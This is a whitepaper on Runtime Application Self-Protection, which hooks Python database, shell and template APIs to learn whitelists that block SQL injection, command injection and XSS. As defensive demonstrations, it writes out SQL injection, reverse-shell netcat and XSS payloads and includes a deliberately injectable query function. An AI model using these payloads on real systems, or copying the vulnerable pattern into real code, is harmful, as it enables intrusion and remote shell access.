
Injecting Security into Web apps at Runtime Whitepaper



This paper discusses the research outcomes of implementing a runtime application patching algorithm on an insecurely coded application to protect it against code injection vulnerabilities and other logical issues related to web applications. It introduces the next-generation web application defence technology dubbed Runtime Application Self-Protection (RASP), which defends against web attacks by working inside your web application. RASP relies on runtime patching to inject security into web apps implicitly, without requiring additional code changes. The talk concludes with the challenges facing this new technology and offers insight into the future of runtime protection.



Injecting Security into Web Applications with Runtime Patching and Context Learning

Ajin Abraham, IMMUNIO inc.
Mike Milner, IMMUNIO inc.
Steve Williams, IMMUNIO inc.
Oliver Lavery, IMMUNIO inc.

Abstract

Web application security is not hard, but it is easy to get wrong, because writing secure code is not as simple as preaching it. To prevent unforeseen incidents, organisations tend to rely on Web Application Firewalls (WAFs). Software and hardware WAFs have existed in the security industry for a long time. They work from outside or around the web application. They act on the HTTP requests arriving at the web server and decide whether to allow or block traffic using traditional signature-based checks. As such, WAFs are never aware of application state.

The strength of these traditional firewalls depends on manually written or predefined rules/signatures. They can also be bypassed if a payload is not in their signature list. In the case of a zero-day vulnerability, a traditional WAF will usually be unable to prevent an attack because it does not know the signature of the exploit payload. The weakness of WAFs is clearly evident with modern application security challenges such as credential stuffing and session hijacking. These attacks cannot be detected because WAFs do not know the application's characteristics and behaviour.

This research offers insight into Runtime Application Self Defence, a method of protecting web applications by hooking critical language/framework APIs and performing application learning to generate rules dynamically. This approach defends against attacks with significantly higher accuracy than WAFs or related technologies.

Introduction

This paper discusses the research outcomes of implementing a proof-of-concept runtime application patching library on an insecurely coded application. We make the application secure against code injection vulnerabilities and other logical issues related to web applications.
We introduce the next-generation web application defence technology, dubbed Runtime Application Self-Protection (RASP) by Gartner. RASP defends against web attacks by understanding an application's runtime behaviour. This is possible because RASP operates from within the web application and relies on runtime patching to inject security into it, without requiring additional code changes. The root cause of code injection vulnerabilities is that the language interpreter cannot distinguish between data and code. The proposed solution detects code context breakouts to identify and prevent code injections, using runtime instrumentation at the framework or language API level. This research focuses mainly on detecting and preventing SQL injection, cross-site scripting (XSS) and remote command execution.
Challenges in Software Development Life Cycle

In a mature organisation, the Software Development Life Cycle (SDLC) is handled by the engineering and security/QA teams. Writing secure code is not trivial, so you cannot reasonably expect developers to write secure code all of the time. Furthermore, logic errors in code lead to bugs that are difficult to catch just by reading the code. The SDLC process involves periodic code reviews, static analysis and penetration testing, depending on the complexity and release frequency of the project. In theory this approach looks fine. For an organisation with large, complex projects, however, it is difficult to provide complete test coverage with the limited manpower of its security teams. If this process were perfect, we would not hear about breaches.

To guard against such unforeseen incidents, enterprises rely on Web Application Firewalls (WAFs) to protect their assets. WAFs are signature based and therefore work very much like an antivirus solution. They may require setting up a hardware device whose configuration and maintenance need a technical expert. A WAF can be defeated at any time by an attack payload that bypasses its signature list or does not match any signature. A typical example is a zero-day exploit for which the WAF does not yet have a signature. To protect against a new vulnerability, you need to update WAF rules regularly, and this protection is available only after the WAF vendor provides a signature.

In the real world, however, things are slightly different. Because of high false positive rates, most organisations that use a WAF run it only in monitoring mode and never turn on blocking/protection mode. These false positives occur because WAFs cannot understand your application's behaviour and characteristics. A WAF can only act on a pre-written generic rule set, which may not apply to your custom-built application.
In addition to a WAF, application security teams must use static and dynamic analysis tools to assess the security of their applications. To get good results, especially from dynamic analysis, all the functional flows of the application need to be covered. During testing, some functional flows may be missed because of application complexity or tool limitations. For example, automated scanners may be unable to analyse every flow in an application. An increasing number of enterprises now follow agile development models in which production builds are generated monthly or even weekly. This delivers customer value faster, but it equally increases the chance of introducing a security vulnerability in each release.

Monkey Patching for Runtime Application Self Defence

The term "monkey patch" refers to dynamic modification of a class or module at runtime. Runtime hooking and patching, or monkey patching, "is a way for a program to extend or modify supporting system software locally (affecting only the running instance of the program)." (Wikipedia)

The RASP approach discussed in this research relies on monkey patching to hook into API functions exposed by a framework or language. The patched function detects context breakouts in real time and so prevents vulnerabilities from being exploited, including by zero-day attacks. Because we work within the application, we achieve better accuracy than a traditional WAF design. We have access to the core components of the web application:

- request/response handling APIs;
- framework APIs that perform template interpolation to render HTML templates;
- SQL drivers that execute queries on a backend database;
- the language's command execution APIs that run shell commands (e.g. os.system() and subprocess.Popen() in Python).

RASP can learn an application's behaviour and functional flows and generate dynamic rules that act as a whitelist.
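The following is a minimal sketch of the hooking step in Python, using only the standard library. The helpers monkey_patch() and deny_all() are hypothetical and not part of any RASP product. The sketch replaces os.system in the running process with a wrapper that passes the arguments to an inspector before the original function runs. Here the inspector simply records every command and refuses it, so nothing reaches the shell.

```python
import functools
import os


def monkey_patch(module, name, inspector):
    """Replace module.<name> with a wrapper that calls inspector() before the original.

    Returns a zero-argument function that restores the original attribute.
    """
    original = getattr(module, name)

    @functools.wraps(original)
    def wrapper(*args, **kwargs):
        inspector(*args, **kwargs)         # may record the arguments or raise to block
        return original(*args, **kwargs)   # only reached if inspector() did not raise

    setattr(module, name, wrapper)         # affects only this running process
    return lambda: setattr(module, name, original)


seen_commands = []


def deny_all(command):
    """Hypothetical inspector: record the shell command, then refuse to run it."""
    seen_commands.append(command)
    raise PermissionError(f"blocked shell command: {command!r}")


original_system = os.system
restore = monkey_patch(os, "system", deny_all)
try:
    os.system("ping -c 3 127.0.0.1")       # intercepted; never reaches the shell
except PermissionError as exc:
    print(exc)                             # blocked shell command: 'ping -c 3 127.0.0.1'
finally:
    restore()
```

The patch only changes the module attribute. Code that did `from os import system` before the patch keeps a reference to the original function, which is one reason a runtime agent would install its hooks as early as possible.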
Once the learning phase is done, RASP monitors for code context breakouts to detect vulnerabilities and prevent exploitation, while still allowing the web application's legitimate functionality.

Security Features and Limitations of Modern Web Frameworks

The web has evolved, and a wide range of web frameworks now simplify web application development. Many of these frameworks recognise the need for application security and add basic protections. These include automatic HTML escaping in templates, built-in anti-CSRF token support, and high-level database abstractions such as ORMs that reduce SQL injection vulnerabilities. A closer look shows that these features do not offer complete protection, only a thin layer of defence. If a developer makes a minor mistake, a security vulnerability can still easily occur. Some of the issues with the built-in security features of web frameworks are:

1. By default, the framework performs only basic HTML escaping on templates, generally by looking for the less-than and greater-than symbols used in HTML. XSS, however, has the concept of context, and each context needs its own specific escaping. Applying the escaping for one context to a different context can still leave the application vulnerable to XSS. For instance, an HTML attribute value interpolation can be exploited without using the less-than or greater-than characters. Another problem occurs when developers intentionally turn off template escaping to write raw HTML, which may in turn contain untrusted user input.

2. Even though ORMs provide APIs to query databases, a risk of SQL injection remains. At some point the ORM has to generate plain SQL queries to perform database operations. The ORM query generator may then build those queries from untrusted user input without proper escaping. For example, this Rails ORM query can cause SQLi with untrusted input:

User.exists? ["name = '#{params[:user]}'"]

Similar code can cause MongoDB injection in Node.js:

db.myCollection.find( { $where: "user_input" } );

Security features provided by web frameworks therefore have clear limitations. They are designed for the generic web application and cannot cover every scenario. This limitation, combined with the fact that developers make mistakes, opens the door to vulnerabilities in modern web applications.

Securing Web Applications with a RASP module

We propose that a well-designed RASP can solve a wide range of AppSec problems, including code injection, with a negligible false positive rate. One main advantage of RASP over other security solutions is that it requires neither changes to the application's source code nor complex manual configuration. You simply include the RASP module in your project. It then monkey patches critical APIs, generates whitelist rules and starts defending against attacks. RASP technologies can learn continually, are easy to maintain and are effective even against zero-day vulnerabilities.
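The learn-then-defend workflow can be sketched as a small per-context whitelist. Everything here is hypothetical, including ContextLearner, the context key strings, the learning threshold and the regular expressions in command_rule(). The token class names are modelled on the shell command example later in this paper. A context stays in learning mode until it has been seen `threshold` times. After that, unseen structures are blocked, while newer contexts keep learning.

```python
import re

# Token classes modelled on the shell-command example; the regexes are
# illustrative assumptions, not the paper's lexer.
CMD_TOKEN_SPEC = [
    ("WHITESPACE", r"\s+"),
    ("SPLITTER", r"&&|\|\||[;|&]"),
    ("ARGUMENT_DASH", r"--?[A-Za-z][\w-]*"),
    ("IP_OR_DOMAIN", r"\d{1,3}(?:\.\d{1,3}){3}|[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+"),
    ("NUMBER", r"\d+"),
    ("UNIX_PATH", r"/[^\s;|&]*"),
    ("STRING", r"[^\s;|&]+"),
]
CMD_LEXER = re.compile("|".join(f"(?P<{n}>{p})" for n, p in CMD_TOKEN_SPEC))


def command_rule(command):
    """Turn a shell command into its token-class structure."""
    kinds, expect_executable = [], True
    for match in CMD_LEXER.finditer(command):
        kind = match.lastgroup
        if kind == "STRING" and expect_executable:
            kind = "EXECUTABLE"  # first word of each (sub)command
        if kind != "WHITESPACE":
            expect_executable = kind == "SPLITTER"
        kinds.append(kind)
    return " ".join(kinds)


class ContextLearner:
    """Hypothetical per-context whitelist: learn for `threshold` calls, then enforce."""

    def __init__(self, rule_of, threshold=3):
        self.rule_of = rule_of      # lexer that turns an API argument into a rule
        self.threshold = threshold
        self.observations = {}      # context -> calls seen while learning
        self.whitelist = {}         # context -> set of learnt rules

    def check(self, context, argument):
        rule = self.rule_of(argument)
        seen = self.observations.get(context, 0)
        if seen < self.threshold:                 # this context is still learning
            self.observations[context] = seen + 1
            self.whitelist.setdefault(context, set()).add(rule)
            return "learned"
        if rule in self.whitelist[context]:       # known structure: allow
            return "allowed"
        return "blocked"                          # context breakout


rasp = ContextLearner(command_rule, threshold=2)
ping_site = "views.py:ping"  # hypothetical context key, e.g. the calling code location
for host in ("127.0.0.1", "10.0.0.7"):
    rasp.check(ping_site, f"ping -c 3 {host}")
print(rasp.check(ping_site, "ping -c 3 192.168.1.20"))                                 # allowed
print(rasp.check(ping_site, "ping -c 3 127.0.0.1 && nc -c /bin/sh 203.0.113.5 1337"))  # blocked
print(rasp.check("views.py:backup", "tar -czf /tmp/db.tgz /var/db"))                   # learned
```

The rule depends only on token classes, so any IP address passes the learnt ping context, but appending a second command changes the structure. The quality of the lexer therefore sets the false positive rate. For example, a lexer that put domain names and IP addresses in different classes would block legitimate input.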
Detection and prevention of Code Injection Vulnerabilities

Code injection vulnerabilities occur because an interpreter/code parser does not distinguish between code and data supplied by a threat agent. This is the fundamental reason injection vulnerabilities exist. We detect SQL injection by looking for context changes which show that a payload has "broken out" of its data context and injected new code instructions. The same method, described below, can be applied to other injection vulnerabilities as well. The process for defending against code injection is as follows:

1. Monkey patching language APIs
2. Lexical analysis to generate dynamic rules
3. Application learning or code context learning
4. Detecting attacks on context breakouts

Monkey patching language APIs

We hook into the critical language APIs where code injection occurs and extract the arguments passed to them. The hooked APIs include:

- database calls that execute SQL queries;
- language APIs that execute shell commands;
- template rendering APIs that render data into templates.

During the initial application learning phase, we collect the arguments passed to these critical APIs and perform lexical analysis on them to generate rules.

Lexical analysis to generate dynamic rules

We perform lexical analysis on SQL queries and on the arguments to shell execution APIs to generate a whitelist of allowable command structures. This involves parsing the query/code argument and tokenizing it with a lexer. The resulting tokens are then used for dynamic rule generation. A typical lexer throws an error when it finds an invalid token. Our custom lexer implementation instead categorises and keeps tokens that are not in the parser's grammar.
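The following is a small regex-based lexer for a toy C-like grammar. It illustrates the difference between a typical lexer and the lossless one described above. The token names, keyword set and patterns are assumptions, and SINGLE_LINE_COMMENT stands in for the paper's SINGLE LINE COMMENT class.

- With `lossless=False`, it behaves like a typical lexer. It drops whitespace and comments and raises an error on unknown characters.
- With `lossless=True`, it keeps every lexeme and labels characters outside the grammar as UNKNOWN instead of failing. The rule string therefore captures the complete structure of the input.

```python
import re

C_TOKEN_SPEC = [
    ("SINGLE_LINE_COMMENT", r"//[^\n]*"),
    ("WHITESPACE", r"\s+"),
    ("CONSTANT", r"\d+"),
    ("NAME", r"[A-Za-z_]\w*"),
    ("OPERATOR", r"[=+\-*/<>!]=?"),
    ("SYMBOL", r"[;,(){}]"),
    ("UNKNOWN", r"."),  # anything outside the toy grammar
]
C_KEYWORDS = {"int", "char", "float", "return", "if", "else", "while"}
C_LEXER = re.compile("|".join(f"(?P<{n}>{p})" for n, p in C_TOKEN_SPEC), re.DOTALL)


def tokenize(source, lossless=True):
    """Return (lexeme, token_class) pairs for the source text."""
    tokens = []
    for match in C_LEXER.finditer(source):
        kind, text = match.lastgroup, match.group()
        if kind == "NAME":
            kind = "KEYWORD" if text in C_KEYWORDS else "IDENTIFIER"
        if not lossless:
            if kind in ("WHITESPACE", "SINGLE_LINE_COMMENT"):
                continue  # a typical lexer discards trivia
            if kind == "UNKNOWN":
                raise SyntaxError(f"invalid token {text!r}")
        tokens.append((text, kind))
    return tokens


def rule(source):
    """The rule is the sequence of token classes from the lossless lexer."""
    return " ".join(kind for _, kind in tokenize(source))


print(tokenize("int value = 100;//value is 100", lossless=False))
# [('int', 'KEYWORD'), ('value', 'IDENTIFIER'), ('=', 'OPERATOR'), ('100', 'CONSTANT'), (';', 'SYMBOL')]
print(rule("int value = 100;//value is 100"))
# KEYWORD WHITESPACE IDENTIFIER WHITESPACE OPERATOR WHITESPACE CONSTANT SYMBOL SINGLE_LINE_COMMENT
```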
A typical lexer will convert:

int value = 100;//value is 100

into:

int (KEYWORD), value (IDENTIFIER), = (OPERATOR), 100 (CONSTANT), ; (SYMBOL)

Our lexer will output this as:

int (KEYWORD), (WHITESPACE), value (IDENTIFIER), (WHITESPACE), = (OPERATOR), (WHITESPACE), 100 (CONSTANT), ; (SYMBOL), //value is 100 (SINGLE LINE COMMENT)

The generated rule will be:

KEYWORD WHITESPACE IDENTIFIER WHITESPACE OPERATOR WHITESPACE CONSTANT SYMBOL SINGLE LINE COMMENT

Application learning or Code context learning
Application learning is crucial for effective runtime self defence. During the learning phase, we tokenize the queries/function arguments to generate rules for all flows through an application. When a RASP is deployed, it spends an initial period learning the application flows. The rules it generates are later used as a whitelist. All the regular flows of the application need to be exercised so that the RASP can learn the application effectively. RASP can learn new code contexts while defending previously learnt ones. Even in a rapidly changing production environment, our RASP can therefore detect changes and perform learning only for newly introduced or modified code. Once application learning is complete for a given application flow, our RASP starts defending against attacks.

Detect attacks on context breakouts

Once the RASP has learnt the web application and the rule generation threshold is met, it can automatically move into defence mode. From then on, every time a critical API is called, the RASP:

1. hooks the arguments to the call;
2. tokenizes them with a lexer to generate a rule;
3. matches that rule against the previously generated whitelist.

If the structure of the tokenized code is not in the whitelist, the RASP blocks the API call and prevents the attack.

Preventing code injection vulnerabilities

This research uses application learning and rule generation to detect vulnerabilities such as SQL injection and remote command execution. The approach is conceptually generic, so the same logic can be applied to other code injection vulnerabilities. The research focuses on the following:

1. SQL injection prevention
2. Remote command injection prevention
3. Context-specific escaping to prevent reflected and stored cross-site scripting

SQL injection prevention

The first step is to hook the SQL execution function and generate SQL context rules.
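The following is a minimal sketch of this step for Python's sqlite3 driver. Built-in classes such as sqlite3.Cursor do not allow their methods to be reassigned. The sketch therefore does not patch execute() directly. Instead, it monkey patches sqlite3.connect to return a Connection subclass whose cursors check every query before running it.

The regex lexer, keyword list, SqlGuard class and single global whitelist are assumptions made for illustration. The token class names mirror those in the worked example that follows, with QUOTED_STRING and UNKNOWN added for inputs the example does not cover. executemany() and executescript() are left unhooked.

```python
import re
import sqlite3

# Toy SQL lexer; QUOTED_STRING and UNKNOWN are additions to the example's classes.
SQL_TOKEN_SPEC = [
    ("WHITESPACE", r"\s+"),
    ("NUMBER", r"\d+(?:\.\d+)?"),
    ("WORD", r"[A-Za-z_][A-Za-z0-9_]*"),
    ("QUOTED_STRING", r"'(?:[^']|'')*'"),
    ("SEPARATOR", r","),
    ("OPERATOR", r"[-*=<>!+/%();.]"),
    ("UNKNOWN", r"."),  # characters outside the toy grammar are kept, not rejected
]
SQL_LEXER = re.compile("|".join(f"(?P<{n}>{p})" for n, p in SQL_TOKEN_SPEC), re.DOTALL)
SQL_KEYWORDS = {"SELECT", "FROM", "WHERE", "UNION", "INSERT", "INTO", "VALUES",
                "CREATE", "TABLE", "AND", "OR", "ORDER", "BY", "LIMIT"}


def sql_rule(query):
    """Token-class structure of a query, e.g. 'KEYWORD WHITESPACE OPERATOR ...'."""
    kinds = []
    for match in SQL_LEXER.finditer(query):
        kind = match.lastgroup
        if kind == "WORD":  # identifiers such as users/id are labelled STRING
            kind = "KEYWORD" if match.group().upper() in SQL_KEYWORDS else "STRING"
        kinds.append(kind)
    return " ".join(kinds)


class InjectionBlocked(Exception):
    """Raised instead of executing a query whose structure was never learnt."""


class SqlGuard:
    def __init__(self):
        self.learning = True
        self.whitelist = set()

    def check(self, query):
        rule = sql_rule(query)
        if self.learning:
            self.whitelist.add(rule)        # learning phase: remember the structure
        elif rule not in self.whitelist:    # protection phase: enforce the whitelist
            raise InjectionBlocked(f"context breakout in {query!r}")


GUARD = SqlGuard()


class GuardedCursor(sqlite3.Cursor):
    def execute(self, sql, parameters=()):
        GUARD.check(sql)
        return super().execute(sql, parameters)


class GuardedConnection(sqlite3.Connection):
    def cursor(self, factory=GuardedCursor):
        return super().cursor(factory=factory)

    def execute(self, sql, parameters=()):
        # Route the Connection.execute() shortcut through a guarded cursor.
        return self.cursor().execute(sql, parameters)


_original_connect = sqlite3.connect


def _guarded_connect(*args, **kwargs):
    kwargs.setdefault("factory", GuardedConnection)
    return _original_connect(*args, **kwargs)


sqlite3.connect = _guarded_connect  # the monkey patch; application code is unchanged

# --- Application code, written as if no RASP were present ---
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'alice')")


def find_user(user_input):
    # Deliberately vulnerable: user input is interpolated into the SQL text.
    return conn.execute(f"SELECT * from users where id={user_input}").fetchall()


find_user("1")            # learnt while GUARD.learning is True
GUARD.learning = False    # switch to protection mode
print(find_user("20"))    # same structure, allowed: prints []
try:
    find_user("1 union select 1,2,3,4 --")
except InjectionBlocked as exc:
    print("blocked:", exc)
```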
We monkey patch the database driver functions responsible for SQL query execution. For this research, we use Python's sqlite3 driver. During the learning phase, we extract the SQL queries executed by the application and perform lexical analysis on them. The resulting tokens form the dynamic rule for each query. For example, consider this SQL query:

SELECT * from users where id=<user input>

If the user input is 1, the query will be:

SELECT * from users where id=1

Lexical analysis of this query generates the following tokens:

| QUERY | TOKEN |
|---|---|
| `SELECT` | KEYWORD |
| (space) | WHITESPACE |
| `*` | OPERATOR |
| (space) | WHITESPACE |
| `from` | KEYWORD |
| (space) | WHITESPACE |
| `users` | STRING |
| (space) | WHITESPACE |
| `where` | KEYWORD |
| (space) | WHITESPACE |
| `id` | STRING |
| `=` | OPERATOR |
| `1` | NUMBER |

The rule corresponding to SELECT * from users where id=1 is therefore:

KEYWORD WHITESPACE OPERATOR WHITESPACE KEYWORD WHITESPACE STRING WHITESPACE KEYWORD WHITESPACE STRING OPERATOR NUMBER

The structure stays the same when the id changes. For example, SELECT * from users where id=20 generates the same rule. During the learning phase, we generate tokenized rules for all the SQL queries executed through the hooked SQL driver.

Now suppose an SQL injection is attempted after the learning phase, against the same query:

SELECT * from users where id=<user_input>

The attacker provides the payload 1 union select 1,2,3,4 -- to trigger an SQL injection. The constructed SQL query will be:

SELECT * from users where id=1 union select 1,2,3,4 --

This query is tokenized into the following structure:

KEYWORD WHITESPACE OPERATOR WHITESPACE KEYWORD WHITESPACE STRING WHITESPACE KEYWORD WHITESPACE STRING OPERATOR NUMBER WHITESPACE KEYWORD WHITESPACE KEYWORD WHITESPACE NUMBER SEPARATOR NUMBER SEPARATOR NUMBER SEPARATOR NUMBER WHITESPACE OPERATOR OPERATOR

In protection mode, the RASP compares this structure with the previously learnt rule for this context:

KEYWORD WHITESPACE OPERATOR WHITESPACE KEYWORD WHITESPACE STRING WHITESPACE KEYWORD WHITESPACE STRING OPERATOR NUMBER

The generated code structure violates the whitelist: the payload breaks out of the data context and tries to execute SQL code. At this stage, we stop the SQL driver from executing the query, which prevents the SQL injection. Because we hook the SQL execute function, we can also identify the exact location of the vulnerable code, including the line number and stack trace.

Remote Command Injection prevention

Conceptually, preventing command injection is similar to preventing SQLi, since both are injection vulnerabilities. Here we monkey patch command execution functions provided by Python, such as os.system(), os.popen() and subprocess.Popen(). We extract the arguments that are executed in the shell and tokenize them with a custom shell command lexer. Our simple lexer can tokenize typical command-line tool arguments. With the help of a parser, it can identify executable names, arguments, strings, IP addresses, numbers, operators, splitters, whitespace and so on. For example, consider a shell command that takes user input:

ping -c 3 <user input>

For a benign input, the command will look like:

ping -c 3 127.0.0.1

After lexical analysis, this command is tokenized as:

| COMMAND | TOKEN |
|---|---|
| `ping` | EXECUTABLE |
| (space) | WHITESPACE |
| `-c` | ARGUMENT_DASH |
| (space) | WHITESPACE |
| `3` | NUMBER |
| (space) | WHITESPACE |
| `127.0.0.1` | IP_OR_DOMAIN |

The rule corresponding to ping -c 3 127.0.0.1 is therefore:

EXECUTABLE WHITESPACE ARGUMENT_DASH WHITESPACE NUMBER WHITESPACE IP_OR_DOMAIN

As with the previous algorithm, during the learning phase we tokenize and learn all the shell commands passed to the language's command execution API calls. Once learning is complete, these rules can be enforced. Consider again the shell command that takes user input:

ping -c 3 <user input>

If the attacker provides the payload && nc -c /bin/sh 1337 to break the context and execute arbitrary code, the shell command is constructed as:
ping -c 3 && nc -c /bin/sh 1337

After lexical analysis, the following structure is generated:

EXECUTABLE WHITESPACE ARGUMENT_DASH WHITESPACE NUMBER WHITESPACE IP_OR_DOMAIN WHITESPACE SPLITTER WHITESPACE EXECUTABLE WHITESPACE ARGUMENT_DASH WHITESPACE UNIX_PATH WHITESPACE IP_OR_DOMAIN WHITESPACE NUMBER

This violates the rule learnt for this context:

EXECUTABLE WHITESPACE ARGUMENT_DASH WHITESPACE NUMBER WHITESPACE IP_OR_DOMAIN

When the rules do not match, our RASP identifies an arbitrary command injection and prevents the command from executing.

Context specific escaping to prevent Reflected and Stored Cross Site Scripting

Cross-site scripting can be complicated by reflection contexts, parser precedence, browser behaviour and so on. This makes it difficult to solve with the approach we used for SQLi and RCE, for several reasons. Lexing large chunks of HTML carries a performance overhead. Browsers are also very lenient about HTML syntax and often auto-correct misaligned tags, attributes, etc.

XSS is all about reflection contexts: if you can detect these contexts and prevent context breakouts, you can effectively prevent XSS. Modern web frameworks use templates and template rendering functions to generate an HTML response with dynamic data substitutions. User input inserted at these points can cause XSS if the data is not properly escaped. A sample template looks like:

<html> <head> <title>Welcome {{ title }} </title> </head> <body> Hello {{ txt }} </body> </html>

Here {{ title }} and {{ txt }} are template expressions that get substituted with data at runtime to generate the final HTML. The data can come from user input, be generated at runtime, or come from a database field. To prevent XSS, we hook the template rendering function of the Tornado web framework and access the template. We then determine the contexts in which data is substituted dynamically during HTML generation.
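The context-determination step can be approximated with only the standard library. The sketch below does not hook Tornado's render(). Instead, it replaces each {{ name }} expression with a marker, feeds the result to html.parser.HTMLParser, and records which of the paper's contexts each marker lands in. Those contexts are html_body, html_comment, attribute_value, attribute_name, iframe_src and anchor_href.

Script contents are not handled here, because they would need separate JavaScript parsing. The marker format, function names and ESCAPERS policies are assumptions for illustration. Under those policies, non-http(s) URLs are replaced with about:blank and values in attribute-name position are dropped.

```python
import html
import re
from html.parser import HTMLParser

PLACEHOLDER = re.compile(r"\{\{\s*(\w+)\s*\}\}")  # only simple {{ name }} expressions
MARKER = re.compile(r"tplvar(\d+)x")               # lowercase: HTMLParser lowercases attribute names
SAFE_URL = re.compile(r"(?:https?://|/)[^\s\x00-\x1f\"'<>]*")


class ContextFinder(HTMLParser):
    """Records the HTML context in which each marker appears."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.contexts = {}

    def _record(self, text, context):
        for index in MARKER.findall(text):
            self.contexts[int(index)] = context

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            self._record(name, "attribute_name")
            if value is None:
                continue
            if (tag, name) == ("iframe", "src"):
                self._record(value, "iframe_src")
            elif (tag, name) == ("a", "href"):
                self._record(value, "anchor_href")
            else:
                self._record(value, "attribute_value")

    def handle_data(self, data):
        self._record(data, "html_body")

    def handle_comment(self, data):
        self._record(data, "html_comment")


def learn_contexts(template):
    """Learning request: map each {{ name }} (in order) to its rendering context."""
    names = []

    def to_marker(match):
        names.append(match.group(1))
        return f"tplvar{len(names) - 1}x"

    finder = ContextFinder()
    finder.feed(PLACEHOLDER.sub(to_marker, template))
    finder.close()
    return [(name, finder.contexts.get(i, "unknown")) for i, name in enumerate(names)]


def _escape_url(value):
    # Hypothetical policy: only absolute http(s) or root-relative URLs survive.
    return html.escape(value) if SAFE_URL.fullmatch(value) else "about:blank"


ESCAPERS = {
    "html_body": lambda v: html.escape(v, quote=False),
    "attribute_value": lambda v: html.escape(v, quote=True),
    "html_comment": lambda v: v.replace("-", "&#45;").replace(">", "&gt;"),
    "anchor_href": _escape_url,
    "iframe_src": _escape_url,
}


def render(template, contexts, values):
    """Later requests: escape each value for its learnt context, then interpolate.

    Contexts without an escaper (attribute_name, unknown) get an empty string.
    """
    escaped = iter([ESCAPERS.get(ctx, lambda v: "")(str(values[name])) for name, ctx in contexts])
    return PLACEHOLDER.sub(lambda match: next(escaped), template)


template = '<p title="{{ tip }}">Hello {{ txt }}</p><a href="{{ link }}">home</a>'
contexts = learn_contexts(template)
print(contexts)
# [('tip', 'attribute_value'), ('txt', 'html_body'), ('link', 'anchor_href')]
page = render(template, contexts, {
    "tip": '" onmouseover="alert(1)',
    "txt": "<b>hi</b>",
    "link": "javascript:alert(1)",
})
print(page)
```

The attribute payload contains no angle brackets. Body-style escaping (quote=False) would therefore let it break out of the title attribute, while the attribute-specific escaper turns its quotes into &quot;.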
The process involves hooking into the templating engine's render() function and extracting three things: the template HTML, the template interpolation points and the data to be interpolated into the template. The template HTML is then normalised to produce the closest representation of how a browser will interpret it. We then construct an HTML syntax tree using an HTML parser, walk the tree and parse each node to determine the template interpolation contexts. Additionally, all JavaScript nodes are parsed separately by a JavaScript parser. Some of the contexts we identify in our proof of concept are:

| CONTEXT | EXAMPLE |
|---|---|
| html_body | `<p>{user_input}</p>` |
| html_comment | `<!-- footer {user_input} -->` |
| attribute_value | `<p alt="{user_input}">foo</p>` |
| attribute_name | `<body {user_input}="foo">` |
| iframe_src | `<iframe src="{user_input}">` |
| anchor_href | `<a href=" {user_input}">foo</a>` |

Reflected and stored XSS context learning happens on the first request, i.e. the first time a template interpolation happens. When the template rendering function is called, we hook it and identify the context of each template interpolation. On subsequent requests to the same template rendering function, the data passed to it is escaped according to its context before template interpolation. This is possible because the learning request revealed the template rendering contexts. We can therefore apply context-specific escaping instead of the generic HTML escaping that the framework provides. A generic WAF will either apply HTML escaping globally or block the request if it detects a potential cross-site scripting payload, which can cause many false positives. Our approach does not block the request. Instead, it applies context-specific escaping to prevent the context breakouts that cause XSS.

Conclusion

We implemented a runtime application self defence algorithm on an insecure Python web application to inject security at runtime. It successfully detected and prevented SQLi, RCE and XSS attacks without additional code changes. The techniques discussed in this research are not an exhaustive list of the defences a RASP can provide. Rather, they cover some significant defences that can be implemented with this technology. We have also discussed how this technology can outperform traditional web application firewalls, which require complex hardware and tuning.
RASP enables us to solve the fundamental code vs data problem of application security by moving from blacklist/signature based checks to a dynamically generated whitelist approach.